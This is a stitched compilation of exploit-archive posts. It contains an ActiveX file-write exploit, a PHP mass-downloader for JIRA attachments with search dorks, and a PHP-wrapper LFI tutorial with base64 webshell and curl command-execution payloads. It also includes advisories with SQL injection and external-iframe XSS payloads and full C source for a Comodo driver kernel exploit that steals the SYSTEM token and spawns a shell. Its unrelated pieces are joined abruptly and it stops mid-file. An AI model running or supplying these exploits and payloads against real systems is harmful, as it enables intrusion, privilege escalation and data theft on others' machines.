source: https://www.securityfocus.com/bid/48483/info

CygniCon CyViewer ActiveX control is prone to a vulnerability caused by an insecure method.

Successfully exploiting this issue will allow attackers to create or overwrite files within the context of the affected application (typically Internet Explorer) that uses the ActiveX control. Attackers may execute arbitrary code with user-level privileges. 

<html>
<object classid='clsid:A6FC2988-16BE-4053-BE89-F562431FD6ED' id='target'></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>

Sub Boom()
arg1="FilePath\Filename_to_create"
arg2="Data"
target.SaveData arg1 ,arg2
End Sub

</script>
</html>
            
source: https://www.securityfocus.com/bid/48484/info

Atlassian JIRA is prone to a security bypass vulnerability.

An attacker can exploit this issue to download arbitrary attachment files within the context of the affected application. 

<?php

/* If it's https, you MUST specify it in the URL or it won't work.
Try using numbers that you get from your Google results, otherwise
you will get a lot of 404s. */


echo "\n############################################################################\n# \n#Attachment downloader by Ignacio Garrido\n#";

if ($argc != 4){echo "
#Usage: php Scuarji.php vulnsite FROM(NUMBER) TO(NUMBER)\n#
#Dork: inurl:/jira/secure/attachment/\n#
#Example: php Scuarji.php http://www.vulnsite/jira/secure/attachment/ 1 12310371#
############################################################################\n";die;}

else{
echo "\n#Let's start!\n";
echo "#\n#Ign.sec@Gmail.com\n#\n############################################################################\n";}

$url2 = $argv[1];

if (substr($url2,0,7) != "http://" && substr($url2,0,8) != "https://")
{
$url = ("http://".$url2);
}
else
{
$url = $argv[1];
}

if ($argv[2] >= $argv[3])
{
echo "\n\n#The second number must be bigger than the first one\n";
die;
}

$numero = $argv[2];

for ($numero;$numero <= $argv[3];$numero++)
{
$head = get_headers("$url$numero/");

if (substr ($head[0],9,3) == "404")
{
echo "\n#File number $numero not found! (404)\n";
}
else{
$explodeo = explode("filename*=",$head[2]);
$explodeo2 = explode(";",$explodeo[1]);
$archivo = substr($explodeo2[0],7);

echo "\n#Downloading file: $archivo\n";
$file=file_get_contents("$url$numero/$archivo");
file_put_contents($archivo,$file);

}
}
echo "\n#All attachment downloaded correctly!\n";
die;

?>
            
HireHackking

PHP Wrappers

When dealing with PHP files, there is a concept known as PHP Wrappers. A wrapper is a kind of envelope that tells the stream (a sequence, request, or data input/output) how to behave.

This PHP feature is very useful in attacks such as LFI and XXE; thanks to it, we can gain some advantages that we would not otherwise have.

The concept of a wrapper will become clearer as we go through it now.

Index:

  • php://filter
  • zip://
  • data://
  • php://input
  • expect://
  • References

php://filter

The filter wrapper lets us encode the file we specify. This is very useful, since it allows us to read PHP files that would otherwise simply be interpreted by the server, returning only their output.

For example, we have the following file:

image 116

As we can see, it has a password in a comment. But if we access the file from the web:

image 117

We only see the output of the interpreted code 😥. However, using the filter wrapper, we will be able to read the whole PHP file.

To test the wrapper, I created an LFI in an index.php file. So, in this LFI, the payload we enter to make use of the wrapper and read the secret.php file will be the following:

  • php://filter/convert.base64-encode/resource=<archivo>
image 118

This way we are reading the secret.php file, but in base64, so if we decode this output:

image 119

We get the whole file. A curious detail about wrappers is that we can chain several of them using a pipe | or a slash /. Example:

image 120
image 121

And we get exactly the same result.

Besides base64 encoding, we can apply ROT13 with the following string:

  • php://filter/read=string.rot13/resource=<archivo>

Although this particular one is not useful for reading PHP files:

image 265

But it does work for other types of files:

image 266

In conclusion, for this wrapper we have the following two payloads:

  • php://filter/convert.base64-encode/resource=<archivo>
  • php://filter/read=string.rot13/resource=<archivo>

zip://

The zip wrapper lets us execute a PHP file that we have placed inside a zip archive. The archive does not even need to have the zip extension; it can have any extension.

This wrapper is not installed by default, but it can be installed with the following command:

  • sudo apt install phpX.Y-zip

Where X and Y are the PHP version we have installed, or the one to which we want to add this feature.

Example of running a webshell through this wrapper:

image 267

Payload:

  • zip://<archivo zip>%23<archivo php>

In <archivo zip>, if the archive is not in the current directory, you would specify the directory where the file is located, and that's it.

Note: if the PHP file is a webshell or expects a parameter, it would be appended with an ampersand, as we see in the following image.

image 268

And even after changing the zip's extension, it will still work:

image 269
image 270

data://

The data wrapper lets us include external data, including PHP code. This wrapper only works if the allow_url_include option is enabled in the PHP configuration (the same option that governs Remote File Inclusion).

Executing PHP code with this wrapper is quite simple; we can do it in two ways:

  • In plain text
  • In base64

In plain text, we would simply use the following payload:

  • data:text/plain,<código PHP>

Example:

image

To do it using base64, we would simply encode the PHP code:

image 264

And place it in the wrapper like so:

  • data://text/plain;base64,<código PHP en base64>
  • data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pgo=

This way, since we are defining a parameter to execute commands, the payload to run, for example, the id command would be:

  • data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pgo=&cmd=id

Example:

image 263

php://input

This wrapper is similar to the one above (data). It can be used to include PHP code. Its requirement, as with the data wrapper, is that the allow_url_include option in the PHP configuration must be enabled.

With that in place, commands can be executed by sending the PHP code in the body of a POST request. Example:

  • curl -s -X POST -d '<código PHP>' 'http://example.com/index.php?file=php://input'
image 262

In this case, we can see the command output in the response.

expect://

The expect wrapper is not installed by default, but if it is, it allows commands to be executed directly as follows:

  • expect://<comando>

This happens because this wrapper gives access to a PTY (pseudo-teletype), which on UNIX basically refers to a terminal. It gives access to STDIN, STDOUT and STDERR.

PHP Wrappers Conclusion

As we have seen, this PHP feature is very useful on many occasions, since it can help us achieve things we otherwise could not. It is quite useful to make use of wrappers when facing vulnerabilities such as Local File Inclusion (LFI) or XML External Entity (XXE), or really in any case where we find we have the ability to use them.
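
As an added defensive illustration that is not part of the original post: a PHP include handler for the index.php?file= style LFI used above, which rejects every wrapper scheme discussed here (php://filter, zip://, data://, php://input, expect://) and confines includes to an allowlist under the web root. The allowlist, the function names and the temporary web root are this example's own assumptions; it needs no database or web server.

```php
<?php
// Added example (not code from the original post): a hardened include for the
// index.php?file=... LFI used above. ALLOWED_PAGES, looks_like_wrapper and
// safe_include_path are this example's own names (assumptions).
declare(strict_types=1);

// Allowlist: user input selects a key; only the fixed path ever reaches include().
const ALLOWED_PAGES = [
    'home'    => 'pages/home.php',
    'contact' => 'pages/contact.php',
];

// Reject any stream wrapper (php://filter, php://input, zip://, data:, expect://)
// generically via the scheme syntax, after URL-decoding so %3A%2F%2F is caught too.
function looks_like_wrapper(string $value): bool
{
    $decoded = rawurldecode($value);
    return (bool) preg_match('~^[a-z][a-z0-9+.-]*:~i', $decoded)
        || strpos($decoded, '://') !== false
        || strpos($decoded, "\0") !== false;
}

// Vulnerable form (the LFI in the post):   include($_GET['file']);
// Hardened form: map to an allowlisted path and confirm the resolved file still
// lives under the web root, so neither wrappers nor ../ traversal can escape.
function safe_include_path(string $requested, string $baseDir): ?string
{
    if (looks_like_wrapper($requested) || !array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . '/' . ALLOWED_PAGES[$requested]);
    if ($base === false || $real === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// The data:// and php://input techniques in the post need allow_url_include=On;
// a hardened handler fails closed if that setting is unexpectedly enabled.
function remote_include_disabled(): bool
{
    return !filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

// Throwaway web root so the path check can be exercised offline (constructed).
$root = sys_get_temp_dir() . '/wrapper_demo_' . getmypid();
mkdir("$root/pages", 0700, true);
file_put_contents("$root/pages/home.php", "<?php echo 'home';\n");

// Inputs constructed to mirror the payload shapes shown in the post.
$inputs = [
    'home',
    'php://filter/convert.base64-encode/resource=secret.php',
    'zip://archive.jpg%23page.php',
    'data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/Pgo=',
    'php://input',
    'expect://id',
    '../../etc/passwd',
];
foreach ($inputs as $file) {
    $path = remote_include_disabled() ? safe_include_path($file, $root) : null;
    printf("%-72s %s\n", $file, $path === null ? 'REJECTED' : 'include ' . $path);
}

unlink("$root/pages/home.php");
rmdir("$root/pages");
rmdir($root);
```

Only the allowlisted key resolves to a path; every wrapper form and the traversal attempt are rejected before include() is ever reached.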

References

  • What do pty and tty mean?
  • expect://
  • File Inclusion / Directory Traversal – HackTheBox Academy

Document Title:
===============
Mangallam CMS - SQL Injection Web Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1421


Release Date:
=============
2015-01-26


Vulnerability Laboratory ID (VL-ID):
====================================
1421


Common Vulnerability Scoring System:
====================================
8.9


Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a remote SQL-Injection web vulnerability in the official Mangallam Content Management System 2015-Q1.


Vulnerability Disclosure Timeline:
==================================
2015-01-26:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


Technical Details & Description:
================================
A remote SQL injection web vulnerability has been discovered in the official Mangallam Content Management System 2015-Q1.
The vulnerability allows an attacker to inject SQL commands and compromise the application and the database management system.

The SQL injection vulnerability is located in the `newsid` value of the vulnerable `news_view.php` application file. Remote attackers 
are able to inject their own SQL commands by manipulating the vulnerable `newsid` value in the `news_view.php` file. A successful attack 
requires manipulating a GET request with the vulnerable `newsid` value to inject SQL commands. The injection is a classic 
ORDER BY SQL injection that allows compromise of the web application and the connected database management system. The request method 
used to inject SQL commands is GET, and the vulnerability is located on the application side of the service.

The security risk of the SQL injection vulnerability is estimated as high with a CVSS (common vulnerability scoring system) count of 8.9.
Exploitation of the application-side web vulnerability requires no privileged web application user account and no user interaction.
Successful exploitation of the security vulnerability results in web application and database management system compromise.

Request Method(s):
				[+] GET

Vulnerable Module(s):
				[+] News

Vulnerable File(s):
				[+] news_view.php

Vulnerable Parameter(s):
				[+] newsid


Proof of Concept (PoC):
=======================
The remote sql injection web vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Dork(s):
allinurl:news_view.php?newsid=    
title:Powered By Powered by Mangallam


PoC:
http://localhost:8080/news_view.php?newsid=-1'[REMOTE SQL-INJECTION VULNERABILITY!]--


Reference(s):
http://localhost:8080/news_view.php


Solution - Fix & Patch:
=======================
The remote vulnerability can be patched by using a prepared statement for the newsid GET parameter.
Restrict and filter the newsid value and disallow input of special characters. Prevent the display of PHP errors by usage of the (0)error (php) function.



Security Risk:
==============
The security risk of the remote sql injection web vulnerability in the content management system is estimated as critical.


Credits & Authors:
==================
IranGuard Security Team - P0!s0nC0d3


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
            
HireHackking

Barracuda Networks Cloud Series - Filter Bypass

Document Title:
===============
Barracuda Networks Cloud Series - Filter Bypass Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=754

Barracuda Networks Security ID (BNSEC): 731


Release Date:
=============
2015-01-19


Vulnerability Laboratory ID (VL-ID):
====================================
754


Common Vulnerability Scoring System:
====================================
4.5


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a filter bypass vulnerability in the official Barracuda Cloud Series Products.


Vulnerability Disclosure Timeline:
==================================
2015-01-19: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Barracuda Networks
Product: Cloud Control Center 2014 Q2


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A filter bypass vulnerability has been discovered in the official Barracuda Networks Cloud Series Appliance Applications 2014-Q1.
The filter bypass issue allows an attacker to bypass the secure filter validation of the service to execute malicious script code.

The Barracuda filter blocks, for example, standard iframes, scripts and other invalid code context: the cloud service has its own
exception handling to parse or encode maliciously injected web context. The mechanism filters the first request and sanitizes the
output in every input field. During a pentest we injected a standard iframe to check and provoke the validation. The frame got blocked!
In the next step the attacker splits (%20%20%20) the request and injects at the end an onload frame pointing to an external malicious
source. The second iframe with the onload alert executes the script code, because the validation encoded only the first script code tag.
The second script code tag bypasses the appliance filter mechanism and executes in the web context of the affected modules. The secure
validation does not recognize a split request, which results in client-side and application-side script code execution in the cloud
series products.

The security risk of the filter bypass vulnerability is estimated as medium and the cvss (common vulnerability scoring system) count is 4.5 (medium).
Exploitation of the filter bypass vulnerability requires a low privileged application user account with restricted access and low user interaction.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects and persistent
manipulation of affected or connected module context.

Vulnerable Request Method(s):
				[+] POST & GET


Proof of Concept (PoC):
=======================
The filter bypass web vulnerability can be exploited by local privileged user accounts and remote attackers with low or medium user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

PoC:
<iframe src=a>%20%20%20%20\"><iframe src=http://vuln-lab.com onload=alert("VL") <

PoC:
<script language=JavaScript>m='%3Ciframe%20src%3Da%3E%2520%2520%2520%2520%5C%22%3E%3Ciframe%20src%3Dhttp%3A//vuln-lab.com%20onload%3Dalert%28%22VL%22%29%20%3C';d=unescape(m);document.write(d);</script>


Solution - Fix & Patch:
=======================
The issue can be patched by a secure validation of the full message input body context of any input or request method attempt.
Ensure that the validation does not only encode the first injected script code because an empty char arrives. Filter all web context
that runs through the requesting procedure and parse it separately to prevent script code injection attacks.

Note: Barracuda Networks patched the vulnerability and acknowledged the researcher. Updates are available in Barracuda Labs and the Customer Service.


Security Risk:
==============
The security risk of the filter bypass web vulnerability in the Barracuda cloud product series is estimated as medium. (CVSS 4.5)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]

HireHackking

VideoLAN VLC Media Player 2.1.5 - Write Access Violation

Title       : VLC Player 2.1.5 Write Access Violation Vulnerability
Discoverer  : Veysel HATAS (@muh4f1z)
Web page    : www.binarysniper.net
Vendor      : VideoLAN VLC Project
Test        : Windows XP SP3
Status      : Fixed
Severity    : High
CVE ID      : CVE-2014-9598 <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-9598>
NIST        : https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9598
OSVDB ID    : 116451 <http://osvdb.org/show/osvdb/116451>
VLC Ticket  : 13390 <https://trac.videolan.org/vlc/ticket/13390>
windbglog   : windbglog.txt <https://trac.videolan.org/vlc/attachment/ticket/13390/windbglog.txt>
Discovered  : 24 November 2014
Reported    : 26 December 2014
Published   : 9 January 2015

Description :
VLC Media Player contains a flaw that is triggered as user-supplied input is not properly sanitized when handling a specially crafted M2V file <http://www.datafilehost.com/d/11daf208>. This may allow a context-dependent attacker to corrupt memory and potentially execute arbitrary code.

# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35902-poc.m2v
# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35902-windbglog.txt
HireHackking
/*
Exploit Title    - Comodo Backup Null Pointer Dereference Privilege Escalation
Date             - 23rd January 2015
Discovered by    - Parvez Anwar (@parvezghh)
Vendor Homepage  - https://www.comodo.com
Tested Version   - 4.4.0.0
Driver Version   - 1.0.0.957 - bdisk.sys
Tested on OS     - 32bit Windows XP SP3 and Windows 7 SP1
OSVDB            - http://www.osvdb.org/show/osvdb/112828
CVE ID           - CVE-2014-9633
Vendor fix url   - http://forums.comodo.com/news-announcements-feedback-cb/comodo-backup-44123-released-t107293.0.html
Fixed version    - 4.4.1.23
Fixed Driver Ver - 1.0.0.972

Note
----
Does not cleanly exit, had to use some leave instructions to get the command prompt.
If you know of a better way please do let me know.

Below is from Windows XP in the IofCallDriver function.

eax = 12h

804e37fe 8b7108          mov     esi,dword ptr [ecx+8]          <- control the null page as ecx = 00000000
804e3801 52              push    edx
804e3802 51              push    ecx
804e3803 ff548638        call    dword ptr [esi+eax*4+38h]      ds:0023:00000080=00000090
804e3807 5e              pop     esi
804e3808 c3              ret

esi + eax*4 + 38h = 0 + 48 + 38 = 80h if ESI is null

*/

#include <stdio.h>
#include <conio.h>
#include <windows.h>

#define BUFSIZE 4096

typedef NTSTATUS (WINAPI *_NtAllocateVirtualMemory)(
    IN HANDLE ProcessHandle,
    IN OUT PVOID *BaseAddress,
    IN ULONG ZeroBits,
    IN OUT PULONG RegionSize,
    IN ULONG AllocationType,
    IN ULONG Protect);

// Windows XP SP3
#define XP_KPROCESS 0x44   // Offset to _KPROCESS from a _ETHREAD struct
#define XP_TOKEN    0xc8   // Offset to TOKEN from the _EPROCESS struct
#define XP_UPID     0x84   // Offset to UniqueProcessId FROM the _EPROCESS struct
#define XP_APLINKS  0x88   // Offset to ActiveProcessLinks _EPROCESS struct

// Windows 7 SP1
#define W7_KPROCESS 0x50   // Offset to _KPROCESS from a _ETHREAD struct
#define W7_TOKEN    0xf8   // Offset to TOKEN from the _EPROCESS struct
#define W7_UPID     0xb4   // Offset to UniqueProcessId FROM the _EPROCESS struct
#define W7_APLINKS  0xb8   // Offset to ActiveProcessLinks _EPROCESS struct

BYTE token_steal_xp[] =
{
    0x52,                                                  // push edx                     Save edx on the stack
    0x53,                                                  // push ebx                     Save ebx on the stack
    0x33,0xc0,                                             // xor eax, eax                 eax = 0
    0x64,0x8b,0x80,0x24,0x01,0x00,0x00,                    // mov eax, fs:[eax+124h]       Retrieve ETHREAD
    0x8b,0x40,XP_KPROCESS,                                 // mov eax, [eax+XP_KPROCESS]   Retrieve _KPROCESS
    0x8b,0xc8,                                             // mov ecx, eax
    0x8b,0x98,XP_TOKEN,0x00,0x00,0x00,                     // mov ebx, [eax+XP_TOKEN]      Retrieves TOKEN
    0x8b,0x80,XP_APLINKS,0x00,0x00,0x00,                   // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
    0x81,0xe8,XP_APLINKS,0x00,0x00,0x00,                   // sub eax, XP_APLINKS         | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
    0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00,  // cmp [eax+XP_UPID], 4        | Compares UniqueProcessId with 4 (System Process)
    0x75,0xe8,                                             // jne ----
    0x8b,0x90,XP_TOKEN,0x00,0x00,0x00,                     // mov edx, [eax+XP_TOKEN]      Retrieves TOKEN and stores on EDX
    0x8b,0xc1,                                             // mov eax, ecx                 Retrieves KPROCESS stored on ECX
    0x89,0x90,XP_TOKEN,0x00,0x00,0x00,                     // mov [eax+XP_TOKEN], edx      Overwrites the TOKEN for the current KPROCESS
    0x5b,                                                  // pop ebx                      Restores ebx
    0x5a,                                                  // pop edx                      Restores edx
    0xc9,                                                  // leave
    0xc9,                                                  // leave
    0xc9,                                                  // leave
    0xc9,                                                  // leave
    0xc3                                                   // ret
};

BYTE token_steal_w7[] =
{
    0x52,                                                  // push edx                     Save edx on the stack
    0x53,                                                  // push ebx                     Save ebx on the stack
    0x33,0xc0,                                             // xor eax, eax                 eax = 0
    0x64,0x8b,0x80,0x24,0x01,0x00,0x00,                    // mov eax, fs:[eax+124h]       Retrieve ETHREAD
    0x8b,0x40,W7_KPROCESS,                                 // mov eax, [eax+W7_KPROCESS]   Retrieve _KPROCESS
    0x8b,0xc8,                                             // mov ecx, eax
    0x8b,0x98,W7_TOKEN,0x00,0x00,0x00,                     // mov ebx, [eax+W7_TOKEN]      Retrieves TOKEN
    0x8b,0x80,W7_APLINKS,0x00,0x00,0x00,                   // mov eax, [eax+W7_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
    0x81,0xe8,W7_APLINKS,0x00,0x00,0x00,                   // sub eax, W7_APLINKS         | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
    0x81,0xb8,W7_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00,  // cmp [eax+W7_UPID], 4        | Compares UniqueProcessId with 4 (System Process)
    0x75,0xe8,                                             // jne ----
    0x8b,0x90,W7_TOKEN,0x00,0x00,0x00,                     // mov edx, [eax+W7_TOKEN]      Retrieves TOKEN and stores on EDX
    0x8b,0xc1,                                             // mov eax, ecx                 Retrieves KPROCESS stored on ECX
    0x89,0x90,W7_TOKEN,0x00,0x00,0x00,                     // mov [eax+W7_TOKEN], edx      Overwrites the TOKEN for the current KPROCESS
    0x5b,                                                  // pop ebx                      Restores ebx
    0x5a,                                                  // pop edx                      Restores edx
    0xc9,                                                  // leave
    0xc9,                                                  // leave
    0xc9,                                                  // leave
    0xc9,                                                  // leave
    0xc3                                                   // ret
};

BYTE ESInull[] = "\x00\x00\x00\x00";
BYTE RETaddr[] = "\x90\x00\x00\x00";

int GetWindowsVersion()
{
    int v = 0;
    DWORD version = 0, minVersion = 0, majVersion = 0;

    version = GetVersion();
    minVersion = (DWORD)(HIBYTE(LOWORD(version)));
    majVersion = (DWORD)(LOBYTE(LOWORD(version)));

    if (minVersion == 1 && majVersion == 5) v = 1;  // "Windows XP";
    if (minVersion == 1 && majVersion == 6) v = 2;  // "Windows 7";

    return v;
}

void spawnShell()
{
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;

    ZeroMemory(&pi, sizeof(pi));
    ZeroMemory(&si, sizeof(si));

    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWNORMAL;

    if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
    {
        printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
        return;
    }

    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
}

int main(int argc, char *argv[])
{
    _NtAllocateVirtualMemory NtAllocateVirtualMemory;
    NTSTATUS allocstatus;
    LPVOID base_addr = (LPVOID)0x00000001;
    DWORD written;
    int rwresult;
    int size = BUFSIZE;
    HANDLE hDevice;
    unsigned char buffer[BUFSIZE];
    unsigned char devhandle[MAX_PATH];

    printf("-------------------------------------------------------------------------------\n");
    printf("      COMODO Backup (bdisk.sys) Null Pointer Dereference EoP Exploit            \n");
    printf("                  Tested on Windows XP SP3/Windows 7 SP1 (32bit)               \n");
    printf("-------------------------------------------------------------------------------\n\n");

    sprintf(devhandle, "\\\\.\\%s", "bdisk");

    NtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtAllocateVirtualMemory");

    if (!NtAllocateVirtualMemory)
    {
        printf("[-] Unable to resolve NtAllocateVirtualMemory\n");
        return -1;
    }

    printf("[+] NtAllocateVirtualMemory [0x%p]\n", NtAllocateVirtualMemory);
    printf("[+] Allocating memory at [0x%p]\n", base_addr);

    allocstatus = NtAllocateVirtualMemory(INVALID_HANDLE_VALUE, &base_addr, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    if (allocstatus)
    {
        printf("[-] An error occured while mapping executable memory. Status = 0x%08x\n", allocstatus);
        printf("Error : %d\n", GetLastError());
        return -1;
    }

    printf("[+] NtAllocateVirtualMemory successful\n");

    memset(buffer, 0x90, BUFSIZE);
    memcpy(buffer+0x00000007, ESInull, sizeof(ESInull)-1);
    memcpy(buffer+0x0000007f, RETaddr, sizeof(RETaddr)-1);

    if (GetWindowsVersion() == 1)
    {
        printf("[i] Running Windows XP\n");
        memcpy(buffer+0x00000100, token_steal_xp, sizeof(token_steal_xp));
        printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp));
    }
    else if (GetWindowsVersion() == 2)
    {
        printf("[i] Running Windows 7\n");
        memcpy(buffer+0x00000100, token_steal_w7, sizeof(token_steal_w7));
        printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_w7));
    }
    else if (GetWindowsVersion() == 0)
    {
        printf("[i] Exploit not supported on this OS\n\n");
        return -1;
    }

    rwresult = WriteProcessMemory(INVALID_HANDLE_VALUE, (LPVOID)0x00000001, buffer, BUFSIZE, &written);

    if (rwresult == 0)
    {
        printf("[-] An error occured while mapping writing memory: %d\n", GetLastError());
        return -1;
    }

    printf("[+] WriteProcessMemory %d bytes written\n", written);
    printf("[~] Press any key to Exploit . . .\n");
    getch();

    hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);

    if (hDevice == INVALID_HANDLE_VALUE)
    {
        printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
        return -1;
    }
    else
    {
        printf("[+] Open %s device successful\n", devhandle);
    }

    CloseHandle(hDevice);

    printf("[+] Spawning SYSTEM Shell\n");
    spawnShell();

    return 0;
}
HireHackking

PHP Webquest 2.6 - SQL Injection

# Exploit Title: sql injection
# Google Dork: inurl:webquest/soporte_horizontal_w.php?id_actividad=
# Date: [24/01/2015]
# Exploit Author: [jord4nroo7] anonjo@aol.com
# Vendor Homepage: [http://phpwebquest.org]
# Software Link: [http://phpwebquest.org/?page_id=14]
# Version: [phpwebquest-2.6]
# Tested on: [windows 8.1]
# Exploit: SQL injection found in the phpwebquest script, version 2.6
#
# Example:
# http://localhost/phpwq/webquest/soporte_horizontal_w.php?id_actividad=184&id_pagina=1%27'
#---------------------------
if ($_GET['id_actividad']!=''){
    $id_actividad=$_GET['id_actividad'];    // ---------> SQL injection here
}else{
    $id_actividad='1500000';
}
if ($_GET['id_pagina']!=''){
    $id_pagina=$_GET['id_pagina'];
}else{
    $id_pagina='1';
    $texto_actual=$texto_alternativo;
    $imagen_actual='../imagenes/no_imagen.gif';
}
#----------------------------

Full source of soporte_horizontal_w.php:

<?
session_cache_limiter('nocache,private');
session_start();
session_set_cookie_params(0, "/", $HTTP_SERVER_VARS["HTTP_HOST"], 0);
include("../include/mysql.php");
include("../include/idioma.php");
$base=$mysql_db;
$c=mysql_connect($mysql_server,$mysql_login,$mysql_pass);
mysql_select_db ($base, $c);
# to work around a problem that arises when users create the activity but do not create any pages
if ($_GET['id_actividad']!=''){
    $id_actividad=$_GET['id_actividad'];
}else{
    $id_actividad='1500000';
}
if ($_GET['id_pagina']!=''){
    $id_pagina=$_GET['id_pagina'];
}else{
    $id_pagina='1';
    $texto_actual=$texto_alternativo;
    $imagen_actual='../imagenes/no_imagen.gif';
}
#echo "PAGINA DEL GET:".$id_pagina."<br>";
#echo "PAGINA DEL GET:".$id_pagina."<br>";
$sentencia= "SELECT * FROM actividad WHERE id_actividad=".$id_actividad;
$resultado=mysql_query($sentencia);
while($v=mysql_fetch_array($resultado)){
    foreach ($v as $indice=>$valor){
        if(!is_int($indice)){
            # echo $indice.":".$valor."<br>";
            $campo[$indice]=$valor;
        }
    }
}
$sentencia="select * from pagina where id_actividad=".$id_actividad." order by num_pagina asc";
$resultado=mysql_query($sentencia);
$j=1;
while($v=mysql_fetch_array($resultado)){
    foreach ($v as $indice=>$valor){
        if(!is_int($indice)){
            #echo $indice.":".$valor."<br>";
            $campo[$j][$indice]=$valor;
        }
    }
    $j++;
}
for ($cont=1; $cont<=5; $cont++){
    if ($campo[$cont]['num_pagina']==$id_pagina){
        $texto_actual=$campo[$cont]['texto'];
        $imagen_actual=$campo[$cont]['imagen'];
    }
}
$resta=0;
$tamano_enlaces=$campo['font_size'] - $resta ;
$tamano_titulo=$campo['font_size'];
#echo $tamano_titulo;
?>
<html>
<head>
<title>PHP Webquest</title>
<!--
Webquest created with PHP Webquest
http://www.phpwebquest.org
Program written by Antonio Temprano under the GPL licence
It may be used free of charge by anyone who wishes to do so for educational purposes,
on condition that these lines of code are not removed
-->
<style>
table {
    font-family : <? echo $campo['font_face'];?>;
    font-size : <? echo $campo['font_size'];?>;
    font-weight : normal;
    color: <? echo $campo['color_texto_principal'];?>;
}
a {
    font-family : <? echo $campo['font_face'];?>;
    font-size : <? echo $campo['font_size'];?>;
    text-decoration: none;
    color: <? echo $campo['color_enlaces'];?>;
    font-weight : normal;
}
a:hover {
    position: relative;
    top: 1px;
    left: 1px;
    font-family : <? echo $campo['font_face'];?>;
    font-size : <? echo $campo['font_size'];?>;
    text-decoration: none;
    color: <? echo $campo['color_enlaces_resaltados'];?>;
    font-weight : normal;
}
